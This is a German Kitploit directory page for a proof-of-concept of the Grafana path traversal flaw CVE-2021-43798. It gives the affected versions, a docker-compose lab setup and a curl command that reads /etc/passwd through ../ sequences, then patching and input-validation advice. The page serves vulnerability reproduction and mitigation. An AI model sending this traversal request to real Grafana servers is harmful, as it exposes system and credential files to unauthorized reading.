Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-43798 — Proof-of-Concept-Exploit für die Grafana-Pfad-Traversal-Schwachstelle (CVE-2021-43798), die unbefugtes Lesen von Dateien durch Directory Traversal in Plugin-Pfaden ermöglicht. | Kitploit
Tools/GitHubGitHub/lim-ahmin/cve-2021-43798
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHublim-ahmin/cve-2021-43798

CVE-2021-43798

Proof-of-Concept-Exploit für die Grafana-Pfad-Traversal-Schwachstelle (CVE-2021-43798), die unbefugtes Lesen von Dateien durch Directory Traversal in Plugin-Pfaden ermöglicht.

Repository anzeigen
1vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-43798

1. Zusammenfassung

  • Grafana ist eine Open-Source-Plattform zur Unterstützung von Datenüberwachung und -verwaltung. In den folgenden Versionen existiert eine Path-Traversal-Schwachstelle, bei der durch die Verwendung von Sonderzeichen wie ../ der Dateipfad manipuliert werden kann.
    • 8.0.0 und höher, unter 8.0.7
    • 8.1.0 und höher, unter 8.1.8
    • 8.2.0 und höher, unter 8.2.7
    • 8.3.0
  • Der anfällige Pfad ist <grafana_host_url>/public/plugins/<plugin_id>/, wobei <plugin_id> die ID des installierten Plugins ist. Der anfällige Pfad kann über die folgenden Ressourcen eingesehen werden.
    • https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p


2. Einrichtung und Ausführung der anfälligen Umgebung

2.1 Verwendete Umgebung

  • Grafana Version 8.2.5

2.2 Ausführung

root@kitploit:~
docker-compose up -d



3. Reproduktion der Schwachstelle

  • Überprüfen des geöffneten Bildschirms Screenshot 2026-07-11 20 31 04



  • Ausführungsergebnis

curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd Dadurch konnte auf etc/passwd zugegriffen werden.

Screenshot 2026-07-11 19 59 12

4. Abschluss (Gegenmaßnahmen)

  • Wenn eine betroffene Version verwendet wird, sollte ein Update auf die gepatchten Versionen 8.3.1, 8.2.7, 8.1.8, 8.0.7 durchgeführt werden.
  • Um Path-Traversal-Schwachstellen zu verhindern, sollte eine Whitelist-Methode angewendet werden, die nur den Zugriff auf erlaubte Pfade gestattet. Zudem müssen Benutzereingaben validiert und Pfade normalisiert werden, um ungewöhnliche Pfadzugriffe wie Verzeichnisaufstiege (../) einzuschränken.

Referenzen

  • https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
  • https://www.cve.org/CVERecord?id=CVE-2021-43798
  • https://labex.io/ko/tutorials/nmap-how-to-control-file-path-traversal-420498
  • https://www.youtube.com/watch?v=j8NkNyoYZzU
Tool herunterladen